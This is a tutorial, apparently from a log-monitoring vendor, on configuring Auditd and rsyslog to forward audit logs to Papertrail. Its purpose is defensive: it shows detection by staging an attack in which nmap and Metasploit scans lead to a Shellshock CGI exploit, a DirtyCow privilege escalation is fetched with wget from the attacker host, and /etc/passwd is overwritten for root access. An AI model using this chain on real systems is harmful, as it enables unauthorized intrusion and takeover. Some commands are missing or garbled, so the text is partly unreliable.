When it comes to managing risk and ensuring the safety of the data within your network, auditing and managing log data is one of the most important components of any monitoring solution. Keeping detailed records of user activities or changes on your critical systems helps you understand what is occurring within your environment and detect real-time risks.
This tutorial will demonstrate deploying Auditd on a standard web server to monitor user logins, modifications to the /etc/passwd file, and changes to any file in the webserver directory. We’ll setup Auditd monitoring and then use a vulnerability testing tool called Metasploit to trigger a warning. We’ll also show you how to use SolarWinds® Papertrail™ to notify you of critical system file or directory changes.
Introduction to Auditd
The Linux 2.6 kernel has the ability to log events such as system calls and file access with a tool called Auditd. All Auditd log files are stored locally and can be parsed or filtered in order to review failed login attempts, user commands, account modifications, and file system changes.
Auditd also integrates with syslog, which can provide enhanced monitoring capabilities like alerting and log archival. Syslog enables additional functionality and allows you to send Auditd log data directly to Papertrail. This allows you to keep a copy for log analysis offsite. They remain accessible even if the target machine is corrupted or an attacker attempts to erase their tracks by deleting the logs. That’s why storing logs off-machine is often a compliance requirement.
Setting up Auditd
In this example, we will focus on monitoring the web service directory and the /etc/passwd file. By monitoring the passwd file and web server directories, IT administrators can see website file changes and any access modifications. To monitor these two locations, you will need to create an audit rule. All audit rules are located in the /etc/audit/audit.rules file. Edit the file and add two lines to monitor the web directory and the /etc/passwd file. Use –w to watch the specified file or directory and –k to assign a key which makes generating reports simpler.
-w /var/www/html –k WEB -w /etc/passwd –k USERS
Then run the following command to restart the Auditd service and start logging changes. All Auditd logs will be stored in the /var/log/audit/ directory.
Papertrail offers a step-by-step guide to see what syslog version you are running. In this example, for Centos 6.7, you can see the system logger is rsyslog. First, you will need to create a configuration file so syslog will know to monitor your Auditd log file. To create the configuration file, run the following command:
Insert the following lines:
$ModLoad imfile $InputFileName /var/log/audit/audit.log $InputFileTag audit $InputFileStateFile audit-file1 $InputFileSeverity info $InputFileFacility local6 $InputRunFileMonitor $InputFilePersistStateInterval 1000
Save the file and exit the file editor. Now edit the rsyslog configuration file with the following command:
Scroll down to the bottom of the file and add the Papertrail log destination.
Replace the “logsN” and “XXXXX” with the host and port from your Papertrail > Settings > Log Destinations page. (Note: The destination in this example will not have any group.)
Then restart the syslog server by running the following command:
sudo /etc/init.d/rsyslog restart
Now you can see syslog data arriving in the Papertrail Events page.
Tracking Logins and File Changes
Now that audit logs are configured, you can test the configuration in a few different ways. You can first try logging into the server with an incorrect password via SSH.
Run the following command to view the audit log entries:
You can see the failed login was captured by the Auditd service.
Next, try creating a file in the web directory by running this command:
This time, instead of listing the whole file contents, you can filter out only changes made to the web directory by using the key you configured in the audit rule:
cat /var/log/audit/audit.log | grep WEB
You can see data in the log file but it is difficult to understand. Auditd has a cleaner way to filter this log data by using aureport. Run the following command to generate a report filtered by key:
aureport –k –i | grep WEB
You can see touch and list commands are being captured for the user root.
Auditd also provides another solution for searching through your log data. You can use ausearch to keep track of all events for each user or even filter by date and time. To run searches for a user, you will need to find the UID for the user account. Check for the UID by running the following command:
Run this command to see all events for the root user:
ausearch –ui 0 –interpret
Here you can see the commands issued by the root user. Now that you can track authorized system access, let’s see how Auditd can track unauthorized access attempts and changes to the system.
Exploiting the System
This exploit demonstration will be implemented using the newest version of Kali Linux. To begin, start a port scan with nmap with the following command:
nmap <ipaddress of webserver>
In this example, you can see SSH, HTTP, and RPC ports are open. I’ve highlighted the HTTP port in red. Let’s run some additional scans to see what we can find.
One of the most powerful tools pre-installed on all Kali Linux distributions is called MetaSploit. MetaSploit contains a large database of exploits we can search from. Start MetaSploit with the following command:
If started successfully, you should see something like this:
The first scan you should run will list any directories provided by the webserver. Search for an HTTP scanner with the following command:
grep http grep dir search scanner
We will use the http/dir_scanner and the http/files_dir web server scanners. Start with dir_scanner by running the following command:
Set RHOSTS to the target IP address with the following command:
set RHOSTS <ip address of target webserver>
You can see the server has the cgi-bin directory exposed. If the webserver is not properly configured, scripts executing from this directory can be vulnerable to remote code execution. Check for scripts by switching to the files_dir scanner with the following command:
Set RHOSTS to the target IP of the webserver, and the path to the cgh-bin directory on the target server and type:
You can see that the server has a backup.sh script in the /cgi-bin directory.
To exploit this script, we will test for a possible shellshock vulnerability, which is a bash shell vulnerability. Search MetaSploit with the following command:
Use the apache_mod_cgi_bash_env_exec exploit by running the following command:
Set RHOST to the target IP address of the server and the TARGETURI to the path of the backup.sh script with the following commands:
set RHOST <ip address of target web server> set TARGETURI /cgi-bin/backup.sh options
Your configuration should look something like this.
When ready type:
You can see a command shell has been opened on the target server as the user Apache. Auditd has also captured the execution of the backup.sh script when the exploit launched and sent the event to Papertrail.
The Apache user runs with limited access, so in order to change system settings, user privileges must be escalated. One of the most reliable tools for privilege escalation attacks is called the DirtyCow. The DirtyCow exploits a copy-on-write (COW) subsystem memory vulnerability in all Linux distributions prior to Kernel 3.19.0. Although not pre-installed with Kali Linux, the DirtyCow exploits can be downloaded from GitHub here. Once you download the script, compile it with the following command:
gcc -pthread dirty.c -o dirty –lcrypt
If successful, you should now have a “dirty” script that has been compiled and ready to run. Copy the “dirty” script to your web directory on the Kali Server and start the webserver.
Now go back to the shell that you opened earlier. Run the following commands to download the “dirty” script to the target webserver and make it executable:
wget http://<ip address of Kali server>/dirty chmod +x dirty.
When you run the “dirty” script, it will replace the /etc/passwd file with a file configured with a root password that you will set. The root user account will also be replaced with a user named “fire”. At this point, you may want to take a backup of the passwd file on your webserver or you will run into issues later. Now, to run the “dirty” script, execute the following command:
On the target server you can check the /etc/passwd file and notice that the root user entry has been changed.
Meanwhile, Auditd, syslog, and Papertrail have captured the execution of the “dirty” script, and the modification to the passwd file.
Now you can try logging into the target web server with the “fire” root user.
By listing the root directory, you can see that the session has root privileges with full control over the server. You can also see that Auditd is still tracking logins made by the malicious user.
In Papertrail you can set up email alerts for any user matching that username to notify you if your network ever falls victim to the DirtyCow. To set up the alert, navigate to the Papertrail events dashboard and search for “fire”.
Click “Save Search” and name it DirtyCow.
Then click “Save & Setup an Alert”. Select any of the options in the alert list like PagerDuty, Amazon SNS, or in this case, Email. Specify the Frequency and enter your email address, and click “create alert.”
Now, every time the DirtyCow exploit is launched you will receive an email alert. If you’re running a server where the user accounts should not change, you might even want to alert when the passwd file is changed. This should not happen except on days when you run password changes.
You have now successfully configured Auditd, syslog, and Papertrail to monitor critical system files and alert you if your server is ever exploited by a high-risk vulnerability.
There are many other Auditd features that can enhance searching, reporting, alerting functions along with Papertrail. Learn more on the auditd man page. Also, make sure to check out SolarWinds Papertrail to store these logs in a safe place where they can’t be deleted, and to alert you to security problems like unexpected usage of your root account.